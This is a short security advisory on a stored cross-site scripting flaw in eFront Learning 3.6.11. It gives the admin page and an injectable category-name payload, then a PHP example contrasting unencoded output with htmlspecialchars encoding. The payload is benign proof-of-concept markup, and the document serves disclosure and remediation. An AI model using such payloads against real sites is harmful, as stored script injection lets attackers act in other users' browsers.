eFront Learning version 3.6.11 suffers from a stored cross site scripting vulnerability.
003e810011af79ee652072521748cd4aa32885be460c9e002ccdbf1dd2107972
# Affected software: efrontlearning
# Type of vulnerability: stored xss
# URL: https://demo.efrontlearning.net/
# Discovered by: Provensec
# Website: https://www.provensec.com
# Description: Open Source e-Learning
# Proof of concept
#version:eFront 3.6.11
Go to add new category:
https://demo.efrontlearning.net/enterprise/www/administrator.php?ctg=directions
Add a new category with the XSS payload "><img src=d onerror=confirm(1);> and
save it. The payload will execute.
#screen:https://prntscr.com/69zhge
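
The remediation for this class of finding is encoding the stored value when it is written back into the page. The following is an added example, not eFront's code and not part of the advisory. It assumes the category name is echoed into a quoted HTML attribute, and its function names are hypothetical. It renders the advisory's payload once without encoding and once with htmlspecialchars, then parses both results to see whether an extra element was created.

```php
<?php
// Added example; not eFront source. All function names are hypothetical.
// Constructed input: the category name used in the proof of concept.
$storedName = '"><img src=d onerror=confirm(1);>';

// Unsafe: the stored value is concatenated into the attribute as-is, so the
// leading "> closes the attribute and the tag, and the rest becomes markup.
function renderCategoryUnsafe(string $name): string
{
    return '<input type="text" name="name" value="' . $name . '">';
}

// Hardened: encode at output time. ENT_QUOTES covers both quote styles,
// so the value cannot terminate a quoted attribute.
function renderCategorySafe(string $name): string
{
    $encoded = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="name" value="' . $encoded . '">';
}

// Parse the rendered markup with an HTML parser (requires the dom extension).
function parseHtml(string $html): DOMDocument
{
    libxml_use_internal_errors(true); // keep parser warnings out of the output
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    return $doc;
}

foreach (['unsafe' => 'renderCategoryUnsafe', 'safe' => 'renderCategorySafe'] as $label => $render) {
    $doc = parseHtml($render($storedName));
    // An <img> element in the parsed tree means the stored value became markup.
    $imgCount = $doc->getElementsByTagName('img')->length;
    // With correct encoding the attribute decodes back to the exact stored string.
    $value = $doc->getElementsByTagName('input')->item(0)->getAttribute('value');
    printf("%-6s injected <img> elements: %d, value round-trips: %s\n",
        $label, $imgCount, $value === $storedName ? 'yes' : 'no');
}
```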